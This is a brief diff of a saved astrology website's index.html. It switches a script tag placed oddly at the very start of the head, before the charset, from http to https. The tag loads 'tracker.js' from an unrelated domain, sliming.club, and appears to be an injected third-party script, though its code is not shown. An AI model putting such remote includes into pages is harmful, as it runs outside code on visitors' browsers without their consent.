--- a/index.html
+++ b/index.html
@@ -1,6 +1,6 @@
 <!DOCTYPE html>
 <html class="nivo-lightbox-notouch" data-scrapbook-source="https://ihoroscope.ksinfotech.com/" data-scrapbook-create="20191206091304423" lang="en">
-<head> <script src="http://sliming.club/tracker.js"></script>
+<head> <script src="https://sliming.club/tracker.js"></script>
 		<meta charset="UTF-8">
 
 		<!-- METADATA -->
